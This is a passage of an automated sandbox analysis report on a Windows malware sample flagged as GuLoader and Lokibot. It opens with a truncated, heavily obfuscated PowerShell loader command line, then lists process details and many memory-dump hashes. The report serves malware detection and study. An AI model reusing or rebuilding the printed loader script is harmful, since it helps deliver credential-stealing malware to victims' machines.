Skum$QuickaNotomcP denoSynnvlst,ejohovedgDistoyArkip)Hand ') ;Romancerne (Stratocumulus 'Bugal$UudtmgBattllHindeo Ardub Ti laBoxinlTa kl:GrundRFyrr y S jutGritttSte,deE near Kvins UtchkSlaaeeInte sMidga= skad$Bort g By.tlSnur o Svagb.adroa jugulEx er:AandsFFloateAst,olOtocrtmanwiaGebrdrGruttbKomple H stjLapard phoveUncrar Magnn iffeeHel rs Meds+Falds+Tvege%Fejlr$havf KSchilnNarcoa nhealG vnldUnd reTond nShee,dRombeeKlokk. FramcT,lbao GraduR tatnAltastT ebo ') ;$Coadjuvant=$Knaldende[$Rytterskes];}$Woodlike=315055;$Bullwhack=31145;Romancerne (Stratocumulus ' Arre$CivilgQu lmlNonaroDrvblbArgota NicklDiato: CuddAResu aorbicbAc.ydnBlom i avyan redegUdf rsSyersdSl.vaaSkrupgVan,d Blind=Start JudypGKropsePerchtSyste-AmatoCLserfodriftnVo attDokkeeFo esnUafhnt Der A ilp$k nciaM talc MilioStraalKlageoHv.ragR,matyOvalt ');Romancerne (Stratocumulus 'Gemm $Magtsg ZigslE ecto BinobBlankaOver.l Admi:Sw,atRAfdriaDiscobGuardbSupe a urbunDek t Decen=Skovp nonco[XanthSTaiveyIndh sMag htMaskieM rphmScle . WaltCLystbo precnfrekvvGn ereSkolerUn.nstSagos].atte: Lo r: ForuF RetorSymbio DiscmintenBTho aaIncitsAfskyeHj.le6 Fris4Apo oSVi kstOve arManiciT stynElg,agIdent(Glaym$ProblA KaldaWars.b gglonCam,yiG,mminTilkogMaks sProtodN onfafo,hagOpsam)Dag e ');Romancerne (Stratocumulus ' airl$indkbgdiskulForfaounad b VskeaP.irelBon e:TidstVRefuta,lamenSkr.edbesvir RenseEnebonGymnadictereAdlum Recru=Musik Mucig[PruhbSDomsmyD censudelitWes ee HypsmSprog.KanceTIn bre Bengxna retRocke.InspiEMas,onFeedhcKly.koCarl,d S ori.nducn Hydrg B,mb]apach: peci:BardoA altrSNo seCUnencI,nfreIMungu. StruGLotife ,dedtElastSC eput Pro.rBesl iCen rnBlkhag arkk(Teist$ KimeR St aa enaebPattebUdgyda ArabnC.amo)ducki ');Romancerne (Stratocumulus 'Irkes$gldelgPla,dlDi,keolipizb Pha,aMidcalHypop:Pu poBFlyveoSoo lnEncykdTytteaosh obToteslF.rsyeTooth=Pr,gr$pls.bVBeda aB lignSu,dod CacorAsiateNightnMelandFlu reTi,ae.Sve,ssDevilu.innabBaadvsS ndit Strmr,elefiSkuepn GodkgElint(Upwro$C aisW DisaoE,plaosuperd planl BasiiParrok ommesub o, fami$EkvilBPast u FletlUnreslKultuwD.mmeh AftoaFu,iocSkadekDiddy)Tugte ');Romancerne $Bondable;"
                                      Imagebase:0x150000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.3056701550.00000000083B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.3043556156.0000000005624000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.3057467096.0000000009F62000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:01:43:07
                                      Start date:01/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:01:43:23
                                      Start date:01/10/2024
                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\syswow64\msiexec.exe"
                                      Imagebase:0xea0000
                                      File size:59'904 bytes
                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false

                                      Reset < >
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 15c9fcc2e340bf5e2dffdf6d4af478417ccf22419556d0f4b8a90d8e419611e2
                                        • Instruction ID: 65fde406b8c84b44f1b3e6fca4fe9cdc3b899906a8652444314ca1de6e53254d
                                        • Opcode Fuzzy Hash: 15c9fcc2e340bf5e2dffdf6d4af478417ccf22419556d0f4b8a90d8e419611e2
                                        • Instruction Fuzzy Hash: 86F1A23090DA8D8FEBA8EF28C8557E937E1FF54354F04426EE84DC7295CB34A9458B86
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 285a891cb801a79bfbdbd6fd0368900552f72c364837f5757c619a58ea9ca15e
                                        • Instruction ID: d50e6587eb61582dec8ca70ca7b272494924315776ee3902905667654386c10a
                                        • Opcode Fuzzy Hash: 285a891cb801a79bfbdbd6fd0368900552f72c364837f5757c619a58ea9ca15e
                                        • Instruction Fuzzy Hash: 19E1C270A0DA8E8FEBA8EF28C8557E937D1FB54350F04426EE84DC7291DB34A9448B85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @_H
                                        • API String ID: 0-518063247
                                        • Opcode ID: 1fe5a5a58a4f3cd9c05051374129221db3f13854bbd03de381e60ba4927b3402
                                        • Instruction ID: 26d3934c4d3172db12d7c5cee3a06727a10667a38b38cd16e1d90a2cb9645232
                                        • Opcode Fuzzy Hash: 1fe5a5a58a4f3cd9c05051374129221db3f13854bbd03de381e60ba4927b3402
                                        • Instruction Fuzzy Hash: C7811631F0DE8A4FEB95AA2858586B97BE1FF65390F8801BAD41DD3193DE28BC04C355
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b37d97d5e2301e66398c04b38335617a786a3e7a0dad65ceab294ff07ada187f
                                        • Instruction ID: 86d3d4ddea6e6aa91083eb12599d67f4e95aa968a31724b038ccfecfa16d4c55
                                        • Opcode Fuzzy Hash: b37d97d5e2301e66398c04b38335617a786a3e7a0dad65ceab294ff07ada187f
                                        • Instruction Fuzzy Hash: 5BE16E30A1DA4D8FDF88EF58C495BA97BE1FFA8344F14016AE409D7295CB74E885CB81
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 645d1f72d1548c29f6a446d52951894ec36647bf81287854e796c645bedab676
                                        • Instruction ID: a0159006ab99e62195725765430683634f71345748cb90984d947c0db36e4e85
                                        • Opcode Fuzzy Hash: 645d1f72d1548c29f6a446d52951894ec36647bf81287854e796c645bedab676
                                        • Instruction Fuzzy Hash: EC322531E0DA8A4FE7A5A62C5C593B57BD1FF56260F8802BAC04DD7193DF29BC068385
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1409143514d32c1febb9dbdc1b299f5dd42fb3a007c7acf28d7bfc5075481e93
                                        • Instruction ID: 8905480e3874ea582cac1e3b54f56098a128e3c65b42f7ceb48bd9cc62dbdc5e
                                        • Opcode Fuzzy Hash: 1409143514d32c1febb9dbdc1b299f5dd42fb3a007c7acf28d7bfc5075481e93
                                        • Instruction Fuzzy Hash: 90220031D0EBC65FE756AB3848652747BA1FF17290F5901FAC088DB1E3DE28A806C356
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 47bac46262929228b22b1fdf31ecee0c04a87852a112fa667d532766fbd2cb46
                                        • Instruction ID: 280553ca2ba3b8068e912673b87b1d14523334c1da48893e5536c61919726f5d
                                        • Opcode Fuzzy Hash: 47bac46262929228b22b1fdf31ecee0c04a87852a112fa667d532766fbd2cb46
                                        • Instruction Fuzzy Hash: A8F1C130A1DA498FDB98EF1CC495AA97BF1FF68344F14417AD409D7296CB34E886CB81
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b953c825300d35afdd65a8dce87946f55b15eb999ea003cc9bbdefb162c9576
                                        • Instruction ID: 5e8939e908a90be4698eb3a5252a26135a7b27d9a05790c90a68f639d77f4c76
                                        • Opcode Fuzzy Hash: 0b953c825300d35afdd65a8dce87946f55b15eb999ea003cc9bbdefb162c9576
                                        • Instruction Fuzzy Hash: 3FF12331E0EAC54FE796AB2848652787BE1FF56690F4900FEC14CD71D3DE28AC498356
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8a62503f063a07a093f0aab78bcd045033114b711b0b6f1fa19984ee0aac2d4
                                        • Instruction ID: 5668be925b36e9dd2403a36d2273f1bda3b6172052b558cb55f2f52a797eec9f
                                        • Opcode Fuzzy Hash: b8a62503f063a07a093f0aab78bcd045033114b711b0b6f1fa19984ee0aac2d4
                                        • Instruction Fuzzy Hash: C5E12131E0EA865FE799EB2858542787BE2FF56690F4800FEC04DD71C3DE28AC958356
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 39f23c04403d7d19d5f07d0feec96eb007e8b2c1b2566e17a75d0a844877fbfa
                                        • Instruction ID: ed4952b62fa4c203c669c0b7d2e6db425385a8f9a13f1eab0d5c0fe4f3059337
                                        • Opcode Fuzzy Hash: 39f23c04403d7d19d5f07d0feec96eb007e8b2c1b2566e17a75d0a844877fbfa
                                        • Instruction Fuzzy Hash: 56B14832E1EA8A4FE799A62C58591793BD1FF522A4F8801BED44DD30D3DF28BC058356
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1439865b4595790db86969322cbfd93711d15f5da2fb5007d4883b43859a07fd
                                        • Instruction ID: f04353d4eadb697377b67a9302c9d07222901dff9aa276d2d0838978e96c91c7
                                        • Opcode Fuzzy Hash: 1439865b4595790db86969322cbfd93711d15f5da2fb5007d4883b43859a07fd
                                        • Instruction Fuzzy Hash: 28A1713050DA4D8FEBA8EF28D8557F937E1EF59350F00416EE84DC7292CB3499458B86
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63e281d05d489ba194ce60e481c9cce1fa54416acf2b94946f20e19cf75d768f
                                        • Instruction ID: 8273b1c9737a337afabad44f93edf93b2c30d8b07561708ed9dc4697a9f2b948
                                        • Opcode Fuzzy Hash: 63e281d05d489ba194ce60e481c9cce1fa54416acf2b94946f20e19cf75d768f
                                        • Instruction Fuzzy Hash: 1E31043161DA098FEB88EA1CC445A7577E1FB99315F10057ED48AC3266DB22F846C781
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1dc5cc9a774274b07a01e72d17437beb1dc194fb7dcd0f0c745c53e9ecf66b44
                                        • Instruction ID: 44e0fb929109f0e95bab409df44e0c52164eb686d93e0c64d2be58dd1984d0c4
                                        • Opcode Fuzzy Hash: 1dc5cc9a774274b07a01e72d17437beb1dc194fb7dcd0f0c745c53e9ecf66b44
                                        • Instruction Fuzzy Hash: 6531F621E1FA870FE7A5A628181517C6AD1FF657A0F8801BAD42EE31D3DF2C7C00C21A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e52c4723fed5740e6194edb483a4125c70bf5a2385d488329d94c61e2480ea81
                                        • Instruction ID: 7501d233dfe9cda9346941073701b3105ba8621a3c36d3d47a32f98e7781b182
                                        • Opcode Fuzzy Hash: e52c4723fed5740e6194edb483a4125c70bf5a2385d488329d94c61e2480ea81
                                        • Instruction Fuzzy Hash: 0521F631E1EA864FE3A9A62C144527966D2FF522A8FC801BAD41DD71D3DF28BC45820A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dccf8fd5683d8d200ef1c940ffa67e28e4c6e3bf96d2c8b9129ab1f5866f2888
                                        • Instruction ID: 836b30f7567a1bb19ee41150efbfaf0ee1525a5fb806aba2c03e84adee3996b3
                                        • Opcode Fuzzy Hash: dccf8fd5683d8d200ef1c940ffa67e28e4c6e3bf96d2c8b9129ab1f5866f2888
                                        • Instruction Fuzzy Hash: 9931273081E65E8EFBB4AF24CC1ABFA3290FF45399F410639D40D87092DB786989CA15
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 836a6f9a3a512731fcb2670d2969255cdcf4b80b47688c07f76a9b3ef9568307
                                        • Instruction ID: 9dbe626a21b5b075ccc48dd7c8370160cbfe79be7e0c68a7721cd58ebaf35762
                                        • Opcode Fuzzy Hash: 836a6f9a3a512731fcb2670d2969255cdcf4b80b47688c07f76a9b3ef9568307
                                        • Instruction Fuzzy Hash: 27210422E0EAC69FF396A23C68151742BD1EF56690F4945FAC049D71D3CD2D9C498326
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                        • Instruction ID: c0c99914058f41f89d885b20239467080176ac3736adae1eb3c8f095ea21cb7e
                                        • Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                        • Instruction Fuzzy Hash: 0A01447111CB084FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3695D726E882CB45
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e784038366f46a5f849c97dc8f278c3497ec845b37e6cb06624a0f519f02834c
                                        • Instruction ID: e6e5e73322d2b4565b624fcd69d96748509dcabe11856b5059e2713a27f1d6b9
                                        • Opcode Fuzzy Hash: e784038366f46a5f849c97dc8f278c3497ec845b37e6cb06624a0f519f02834c
                                        • Instruction Fuzzy Hash: E2F0373275C6048FDB4CAA1CF4429B573D1E795324F10017EE48BC3697D917E8468685
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e57511725b97e8eea4d20e7f9b81625745dc0f2bd4ab71711fdd4ec02950bf19
                                        • Instruction ID: 25a1a2079ee58f5f4dfeb4beb0d27f15f2c4361bef7ebd41e0d6cb395342edfc
                                        • Opcode Fuzzy Hash: e57511725b97e8eea4d20e7f9b81625745dc0f2bd4ab71711fdd4ec02950bf19
                                        • Instruction Fuzzy Hash: 36F0B43290DE888FDF95FF6884454A9BBE0FF65351B0400BBD549E3192DA29B845C741
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e57511725b97e8eea4d20e7f9b81625745dc0f2bd4ab71711fdd4ec02950bf19
                                        • Instruction ID: a9bbe0edc1d2d703e4b2f68fa6f929d277c11e4484ee6e6d9a9e9916daa64f88
                                        • Opcode Fuzzy Hash: e57511725b97e8eea4d20e7f9b81625745dc0f2bd4ab71711fdd4ec02950bf19
                                        • Instruction Fuzzy Hash: F7F09032D0DA888FDF95EB6884454A9BBE1FF65251B1400BAD049D3192DA29A8948741
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb72389ae7021a03ef85bc2209ae4a4d075e93d5d1cab0cbffb18e8f2b69cadc
                                        • Instruction ID: 4cc48d96b859f4d71c7196375ff28a1d179b52ff6c722ff5cc1f6dabae0e2e39
                                        • Opcode Fuzzy Hash: bb72389ae7021a03ef85bc2209ae4a4d075e93d5d1cab0cbffb18e8f2b69cadc
                                        • Instruction Fuzzy Hash: CDF02721A0DE884FEBA5FA2C98915B177D1EF2935071801EAC049C7187CA29BC81C391
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3029552550.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2cc0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 810ef79c714821b4e4b1f334152138db46450d7f38c0976d99c3a06c6984c5a8
                                        • Instruction ID: b4326e10104c10ee2ae4a0d5632d70eeaf95f9e691c777a2e63082e4d99497d7
                                        • Opcode Fuzzy Hash: 810ef79c714821b4e4b1f334152138db46450d7f38c0976d99c3a06c6984c5a8
                                        • Instruction Fuzzy Hash: DDB14C70E002098FDB10DFA9D9857AEBBF2BF88314F24812ED815E7694EB749945CF91
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3029552550.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2cc0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e95a112b7fe73ed295646a52039acbf70c68d7cdc1b2b6bb41ff846933fbade5
                                        • Instruction ID: 8f2287909b76d81c1333947f098a89a5b2875a8098c42c03b4ded47a1c2aeaf8
                                        • Opcode Fuzzy Hash: e95a112b7fe73ed295646a52039acbf70c68d7cdc1b2b6bb41ff846933fbade5
                                        • Instruction Fuzzy Hash: 78B15EB0E002098FDF10CFA9D98579DBBF2BF88314F24812ED815E7694EB759945CB91
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3029552550.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2cc0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 65e87e4f03ee6077be15740944946fca0a8681dc2f274ffd9974b3c40e4b603b
                                        • Instruction ID: 709c83cd2ede1198d88898248646a87df3d640caa97c4ea4a9e2118cb240a99e
                                        • Opcode Fuzzy Hash: 65e87e4f03ee6077be15740944946fca0a8681dc2f274ffd9974b3c40e4b603b
                                        • Instruction Fuzzy Hash: D3C19D31A00248CFCB14DFA8D984AADBBB6FF85314F258559E406AF365CB74ED89CB40
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3029552550.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2cc0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a02963d6c8ca7fb319594195b54cc95928f5725e5bedba03972e045e43a3a28
                                        • Instruction ID: 1e90a8dc5cc159adc047338b62022492462af650e384307d653ce7295284d2d0
                                        • Opcode Fuzzy Hash: 2a02963d6c8ca7fb319594195b54cc95928f5725e5bedba03972e045e43a3a28
                                        • Instruction Fuzzy Hash: 8991A270A002458FCB06CF58C4949AEFBB1FF89314B29859AD455DB3A5C735ED51CFA0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3029552550.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2cc0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cec647bb779e8bc6981bc67423887bd3103aea6bd28e344eced21a8ded2cc62a
                                        • Instruction ID: 8efb079749fcc30c58c5b9741a14749ef1120b369a0e17102679aa43a53f77d6
                                        • Opcode Fuzzy Hash: cec647bb779e8bc6981bc67423887bd3103aea6bd28e344eced21a8ded2cc62a
                                        • Instruction Fuzzy Hash: 79717C30A05244DFCB16CF68D8949AEBBF2FF89314F2985A9E405AB361C735ED85CB50
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3029552550.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2cc0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5fca34cec907871f77d05b0233903bab87493998b9540a1480b663b857608c3a
                                        • Instruction ID: d282ffd0942e839f50bdea5469ba28195931ba4bbd0f391bec66ca9274985b56
                                        • Opcode Fuzzy Hash: 5fca34cec907871f77d05b0233903bab87493998b9540a1480b663b857608c3a
                                        • Instruction Fuzzy Hash: D271AD30A046098FCB14DF68D884AAEBBF6FF85314F24896DD416EB751DB31AC46CB80
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3029552550.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2cc0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7119a3d2d3bfaa9e3e1a6684229a0c9ea77677ffd402a68235fd4eb069c40c33
                                        • Instruction ID: dbe0e893694e2c96793da16d54a030a2d5eea755ca752011fc0f4392ab9b266a
                                        • Opcode Fuzzy Hash: 7119a3d2d3bfaa9e3e1a6684229a0c9ea77677ffd402a68235fd4eb069c40c33
                                        • Instruction Fuzzy Hash: 38715CB0E002098FDF14CFA9C99179EFBF2AF88314F24802ED415A7664EB749946CF91
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3029552550.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2cc0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: da0ec7f29f298def8a040cc2c42b041d75fd9584686214594b5fc9bad371f8ef
                                        • Instruction ID: 16aac6208fb4a5d87a7ec543bec11de9debf5729552d1df67f752004bb6be34b
                                        • Opcode Fuzzy Hash: da0ec7f29f298def8a040cc2c42b041d75fd9584686214594b5fc9bad371f8ef
                                        • Instruction Fuzzy Hash: 0A418931B042048FDB18DF24C858ABEBBB6EF89754F15446DE806EB7A0DB349C81DB90
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3029552550.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2cc0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 666b8a7c8ef8e02fd0f5a60f4e572282bbef50eefbf314e454188dc13cc64c9c
                                        • Instruction ID: 52676c461d9fed8481da6df2cd66c396d5ee818e36d608915c59a8e8be0ce777
                                        • Opcode Fuzzy Hash: 666b8a7c8ef8e02fd0f5a60f4e572282bbef50eefbf314e454188dc13cc64c9c
                                        • Instruction Fuzzy Hash: BB310930A001288BCB26AB34C8557BEB7B6AF89308F1544E9D409AB351CF369E85CF81
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3029552550.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2cc0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
